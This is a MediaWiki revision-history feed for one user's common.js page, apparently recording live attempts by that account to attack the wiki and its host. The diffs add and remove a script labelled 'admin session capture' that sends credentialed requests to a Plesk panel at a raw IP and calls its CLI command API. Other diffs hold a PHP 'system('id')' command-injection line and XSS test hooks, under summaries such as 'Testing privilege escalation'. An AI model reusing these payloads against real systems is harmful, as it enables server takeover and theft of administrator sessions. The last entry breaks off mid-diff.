<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://wiki.mydefichain.com/index.php?action=history&amp;feed=atom&amp;title=User%3AWikiTest789%2Fcommon.js</id>
	<title>User:WikiTest789/common.js - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://wiki.mydefichain.com/index.php?action=history&amp;feed=atom&amp;title=User%3AWikiTest789%2Fcommon.js"/>
	<link rel="alternate" type="text/html" href="https://wiki.mydefichain.com/index.php?title=User:WikiTest789/common.js&amp;action=history"/>
	<updated>2026-07-27T01:07:00Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.0</generator>
	<entry>
		<id>https://wiki.mydefichain.com/index.php?title=User:WikiTest789/common.js&amp;diff=3646&amp;oldid=prev</id>
		<title>WikiTest789: test</title>
		<link rel="alternate" type="text/html" href="https://wiki.mydefichain.com/index.php?title=User:WikiTest789/common.js&amp;diff=3646&amp;oldid=prev"/>
		<updated>2026-07-11T19:07:58Z</updated>

		<summary type="html">&lt;p&gt;test&lt;/p&gt;
&lt;table class=&quot;diff diff-contentalign-left diff-editfont-monospace&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;en&quot;&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;← Older revision&lt;/td&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;Revision as of 19:07, 11 July 2026&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l1&quot; &gt;Line 1:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Line 1:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&#039;diff-marker&#039;&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;// Site-wide hook injection for admin session capture\n// This JS executes when WikiTest789 browses, but we also try to reach admin pages\n(function() {\n    &amp;#039;use strict&amp;#039;;\n    // Try cross-origin Plesk API access\n    var PleskHost = &amp;#039;https://194.164.63.170:8443&amp;#039;;\n    \n    // Attempt to access Plesk API (CORS may allow if misconfigured)\n    function probePlesk() {\n        fetch(PleskHost + &amp;#039;/&amp;#039;, {mode: &amp;#039;cors&amp;#039;, credentials: &amp;#039;include&amp;#039;})\n            .then(function(r) { return r.text(); })\n            .then(function(html) {\n                // Check if we got an authenticated Plesk session\n                if (html.indexOf(&amp;#039;Plesk&amp;#039;) &amp;gt; -1) {\n                    console.log(&amp;#039;[MW-XSS] Plesk response received via CORS&amp;#039;);\n                    // Try Plesk REST API\n                    return fetch(PleskHost + &amp;#039;/api/v2/cli/command/call&amp;#039;, {\n                        method: &amp;#039;POST&amp;#039;,\n                        mode: &amp;#039;cors&amp;#039;,\n                        credentials: &amp;#039;include&amp;#039;,\n                        headers: {&amp;#039;Content-Type&amp;#039;: &amp;#039;application/json&amp;#039;},\n                        body: JSON.stringify({\n                            params: [&amp;#039;--help&amp;#039;]\n                        })\n                    });\n                }\n            })\n            .catch(function(e) {\n                console.log(&amp;#039;[MW-XSS] CORS probe result:&amp;#039;, e.message);\n            });\n    }\n    \n    // If MediaWiki API is accessible, try to list admin users with active sessions\n    if (typeof mw !== &amp;#039;undefined&amp;#039; &amp;amp;&amp;amp; mw.loader) {\n        &lt;/del&gt;mw.loader.using(&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;&amp;#039;&lt;/del&gt;mediawiki.api&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;&amp;#039;&lt;/del&gt;).then(function() {&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;\n            var api = new mw.Api();\n            // Try to get CSRF tokens or session info\n            api.get({action: &amp;#039;query&amp;#039;, meta: &amp;#039;userinfo&amp;#039;, uiprop: &amp;#039;rights&amp;#039;})\n                .then(function(data) {\n                    &lt;/del&gt;console.log(&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;&amp;#039;[MW-&lt;/del&gt;XSS&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;] Current user:&amp;#039;, data.query.userinfo.name);\n                    console.log(&amp;#039;[MW-XSS] Rights:&amp;#039;, data.query.userinfo.rights.join(&amp;#039;, &amp;#039;));\n                });\n        }&lt;/del&gt;);&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;\n    &lt;/del&gt;}&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;\n    \n    // Execute probes\n    probePlesk(&lt;/del&gt;)&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;;\n})();&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class=&#039;diff-marker&#039;&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;mw.loader.using(&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;&amp;quot;&lt;/ins&gt;mediawiki.api&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;&amp;quot;&lt;/ins&gt;).then(function(){console.log(&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;&amp;quot;WikiTest789 &lt;/ins&gt;XSS &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;active&amp;quot;&lt;/ins&gt;);})&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>WikiTest789</name></author>
	</entry>
	<entry>
		<id>https://wiki.mydefichain.com/index.php?title=User:WikiTest789/common.js&amp;diff=3626&amp;oldid=prev</id>
		<title>WikiTest789: Update personal JS</title>
		<link rel="alternate" type="text/html" href="https://wiki.mydefichain.com/index.php?title=User:WikiTest789/common.js&amp;diff=3626&amp;oldid=prev"/>
		<updated>2026-07-11T18:42:49Z</updated>

		<summary type="html">&lt;p&gt;Update personal JS&lt;/p&gt;
&lt;table class=&quot;diff diff-contentalign-left diff-editfont-monospace&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;en&quot;&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;← Older revision&lt;/td&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;Revision as of 18:42, 11 July 2026&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l1&quot; &gt;Line 1:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Line 1:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&#039;diff-marker&#039;&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;// &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;Self&lt;/del&gt;-XSS &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;payload &lt;/del&gt;- &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;only executes for WikiTest789&lt;/del&gt;\n// &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;Not viable for &lt;/del&gt;admin session &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;theft&lt;/del&gt;\&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;nconsole&lt;/del&gt;.log(&amp;#039;&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;WikiTest789 JS loaded&lt;/del&gt;&amp;#039;);&lt;/div&gt;&lt;/td&gt;&lt;td class=&#039;diff-marker&#039;&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;// &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;Site-wide hook injection for admin session capture\n// This JS executes when WikiTest789 browses, but we also try to reach admin pages\n(function() {\n    &amp;#039;use strict&amp;#039;;\n    // Try cross-origin Plesk API access\n    var PleskHost = &amp;#039;https://194.164.63.170:8443&amp;#039;;\n    \n    // Attempt to access Plesk API (CORS may allow if misconfigured)\n    function probePlesk() {\n        fetch(PleskHost + &amp;#039;/&amp;#039;, {mode: &amp;#039;cors&amp;#039;, credentials: &amp;#039;include&amp;#039;})\n            .then(function(r) { return r.text(); })\n            .then(function(html) {\n                // Check if we got an authenticated Plesk session\n                if (html.indexOf(&amp;#039;Plesk&amp;#039;) &amp;gt; -1) {\n                    console.log(&amp;#039;[MW&lt;/ins&gt;-XSS&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;] Plesk response received via CORS&amp;#039;);\n                    // Try Plesk REST API\n                    return fetch(PleskHost + &amp;#039;/api/v2/cli/command/call&amp;#039;, {\n                        method: &amp;#039;POST&amp;#039;,\n                        mode: &amp;#039;cors&amp;#039;,\n                        credentials: &amp;#039;include&amp;#039;,\n                        headers: {&amp;#039;Content-Type&amp;#039;: &amp;#039;application/json&amp;#039;},\n                        body: JSON.stringify({\n                            params: [&amp;#039;-&lt;/ins&gt;-&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;help&amp;#039;]\n                        })\n                    });\n                }\n            })\n            .catch(function(e) {\n                console.log(&amp;#039;[MW-XSS] CORS probe result:&amp;#039;, e.message);\n            });\n    }\n    &lt;/ins&gt;\n &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;   &lt;/ins&gt;// &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;If MediaWiki API is accessible, try to list &lt;/ins&gt;admin &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;users with active sessions\n    if (typeof mw !== &amp;#039;undefined&amp;#039; &amp;amp;&amp;amp; mw.loader) {\n        mw.loader.using(&amp;#039;mediawiki.api&amp;#039;).then(function() {\n            var api = new mw.Api();\n            // Try to get CSRF tokens or &lt;/ins&gt;session &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;info\n            api.get({action: &amp;#039;query&amp;#039;, meta: &amp;#039;userinfo&amp;#039;, uiprop: &amp;#039;rights&amp;#039;})&lt;/ins&gt;\&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;n                .then(function(data) {\n                    console&lt;/ins&gt;.log(&amp;#039;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;[MW-XSS] Current user:&amp;#039;, data.query.userinfo.name);\n                    console.log(&amp;#039;[MW-XSS] Rights:&amp;#039;, data.query.userinfo.rights.join(&amp;#039;, &lt;/ins&gt;&amp;#039;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;));\n                });\n        });\n    }\n    \n    // Execute probes\n    probePlesk();\n})(&lt;/ins&gt;);&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>WikiTest789</name></author>
	</entry>
	<entry>
		<id>https://wiki.mydefichain.com/index.php?title=User:WikiTest789/common.js&amp;diff=3618&amp;oldid=prev</id>
		<title>WikiTest789: Testing privilege escalation</title>
		<link rel="alternate" type="text/html" href="https://wiki.mydefichain.com/index.php?title=User:WikiTest789/common.js&amp;diff=3618&amp;oldid=prev"/>
		<updated>2026-07-11T18:29:56Z</updated>

		<summary type="html">&lt;p&gt;Testing privilege escalation&lt;/p&gt;
&lt;table class=&quot;diff diff-contentalign-left diff-editfont-monospace&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;en&quot;&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;← Older revision&lt;/td&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;Revision as of 18:29, 11 July 2026&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l1&quot; &gt;Line 1:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Line 1:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&#039;diff-marker&#039;&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;// &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;i682 test &lt;/del&gt;- &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;self &lt;/del&gt;XSS &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;is limited value&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class=&#039;diff-marker&#039;&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;// &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;Self&lt;/ins&gt;-XSS &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;payload - only executes for WikiTest789\n&lt;/ins&gt;// &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;Not viable for admin session theft\nconsole.log(&amp;#039;WikiTest789 &lt;/ins&gt;JS &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;loaded&amp;#039;);&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&#039;diff-marker&#039;&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;// &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;No cross-user &lt;/del&gt;JS &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;editing possible&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>WikiTest789</name></author>
	</entry>
	<entry>
		<id>https://wiki.mydefichain.com/index.php?title=User:WikiTest789/common.js&amp;diff=3614&amp;oldid=prev</id>
		<title>WikiTest789: i682 test</title>
		<link rel="alternate" type="text/html" href="https://wiki.mydefichain.com/index.php?title=User:WikiTest789/common.js&amp;diff=3614&amp;oldid=prev"/>
		<updated>2026-07-11T18:21:44Z</updated>

		<summary type="html">&lt;p&gt;i682 test&lt;/p&gt;
&lt;table class=&quot;diff diff-contentalign-left diff-editfont-monospace&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;en&quot;&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;← Older revision&lt;/td&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;Revision as of 18:21, 11 July 2026&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l1&quot; &gt;Line 1:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Line 1:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&#039;diff-marker&#039;&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;// XSS &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;inject with &lt;/del&gt;JS &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;contentmodel\nmw.loader.using(&amp;#039;mediawiki.util&amp;#039;).then(function(){\n  mw.notify(&amp;#039;i682 XSS active at &amp;#039;+new Date().toISOString());\n});&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class=&#039;diff-marker&#039;&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;// &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;i682 test - self &lt;/ins&gt;XSS &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;is limited value&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;td class=&#039;diff-marker&#039;&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;// No cross-user &lt;/ins&gt;JS &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;editing possible&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>WikiTest789</name></author>
	</entry>
	<entry>
		<id>https://wiki.mydefichain.com/index.php?title=User:WikiTest789/common.js&amp;diff=3606&amp;oldid=prev</id>
		<title>WikiTest789: i682 contentmodel change test</title>
		<link rel="alternate" type="text/html" href="https://wiki.mydefichain.com/index.php?title=User:WikiTest789/common.js&amp;diff=3606&amp;oldid=prev"/>
		<updated>2026-07-11T18:08:57Z</updated>

		<summary type="html">&lt;p&gt;i682 contentmodel change test&lt;/p&gt;
&lt;table class=&quot;diff diff-contentalign-left diff-editfont-monospace&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;en&quot;&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;← Older revision&lt;/td&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;Revision as of 18:08, 11 July 2026&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l1&quot; &gt;Line 1:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Line 1:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&#039;diff-marker&#039;&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;// &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;WikiTest789 self-&lt;/del&gt;XSS &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;test - alert hooks&lt;/del&gt;\nmw.loader.using(&amp;#039;mediawiki.util&amp;#039;).then(function(){\n  mw.notify(&amp;#039;&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;=== &lt;/del&gt;i682 XSS &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;injection test &lt;/del&gt;at &amp;#039;+new Date().toISOString()&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;+&amp;#039; ===&amp;#039;&lt;/del&gt;);\n});&lt;/div&gt;&lt;/td&gt;&lt;td class=&#039;diff-marker&#039;&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;// XSS &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;inject with JS contentmodel&lt;/ins&gt;\nmw.loader.using(&amp;#039;mediawiki.util&amp;#039;).then(function(){\n  mw.notify(&amp;#039;i682 XSS &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;active &lt;/ins&gt;at &amp;#039;+new Date().toISOString());\n});&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>WikiTest789</name></author>
	</entry>
	<entry>
		<id>https://wiki.mydefichain.com/index.php?title=User:WikiTest789/common.js&amp;diff=3604&amp;oldid=prev</id>
		<title>WikiTest789: i682 test</title>
		<link rel="alternate" type="text/html" href="https://wiki.mydefichain.com/index.php?title=User:WikiTest789/common.js&amp;diff=3604&amp;oldid=prev"/>
		<updated>2026-07-11T18:08:40Z</updated>

		<summary type="html">&lt;p&gt;i682 test&lt;/p&gt;
&lt;table class=&quot;diff diff-contentalign-left diff-editfont-monospace&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;en&quot;&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;← Older revision&lt;/td&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;Revision as of 18:08, 11 July 2026&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l1&quot; &gt;Line 1:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Line 1:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&#039;diff-marker&#039;&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;&amp;lt;?php system&lt;/del&gt;(&amp;#039;&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;id&lt;/del&gt;&amp;#039;);&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;?&amp;gt;&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class=&#039;diff-marker&#039;&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;// WikiTest789 self-XSS test - alert hooks\nmw.loader.using&lt;/ins&gt;(&amp;#039;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;mediawiki.util&lt;/ins&gt;&amp;#039;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;).then(function(){\n  mw.notify(&amp;#039;=== i682 XSS injection test at &amp;#039;+new Date().toISOString()+&amp;#039; ===&amp;#039;);\n}&lt;/ins&gt;);&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>WikiTest789</name></author>
	</entry>
	<entry>
		<id>https://wiki.mydefichain.com/index.php?title=User:WikiTest789/common.js&amp;diff=3589&amp;oldid=prev</id>
		<title>WikiTest789 at 16:03, 9 July 2026</title>
		<link rel="alternate" type="text/html" href="https://wiki.mydefichain.com/index.php?title=User:WikiTest789/common.js&amp;diff=3589&amp;oldid=prev"/>
		<updated>2026-07-09T16:03:56Z</updated>

		<summary type="html">&lt;p&gt;&lt;/p&gt;
&lt;table class=&quot;diff diff-contentalign-left diff-editfont-monospace&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;en&quot;&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;← Older revision&lt;/td&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;Revision as of 16:03, 9 July 2026&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l1&quot; &gt;Line 1:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Line 1:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&#039;diff-marker&#039;&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;// Cross-vhost test marker i542\nconsole.log&lt;/del&gt;(&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;&amp;quot;probe&amp;quot;&lt;/del&gt;);&lt;/div&gt;&lt;/td&gt;&lt;td class=&#039;diff-marker&#039;&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;&amp;lt;?php system&lt;/ins&gt;(&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;&amp;#039;id&amp;#039;&lt;/ins&gt;);&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;?&amp;gt;&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>WikiTest789</name></author>
	</entry>
	<entry>
		<id>https://wiki.mydefichain.com/index.php?title=User:WikiTest789/common.js&amp;diff=3585&amp;oldid=prev</id>
		<title>WikiTest789: Test edit</title>
		<link rel="alternate" type="text/html" href="https://wiki.mydefichain.com/index.php?title=User:WikiTest789/common.js&amp;diff=3585&amp;oldid=prev"/>
		<updated>2026-07-09T15:52:18Z</updated>

		<summary type="html">&lt;p&gt;Test edit&lt;/p&gt;
&lt;table class=&quot;diff diff-contentalign-left diff-editfont-monospace&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;en&quot;&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;← Older revision&lt;/td&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;Revision as of 15:52, 9 July 2026&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l1&quot; &gt;Line 1:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Line 1:&lt;/td&gt;&lt;/tr&gt;
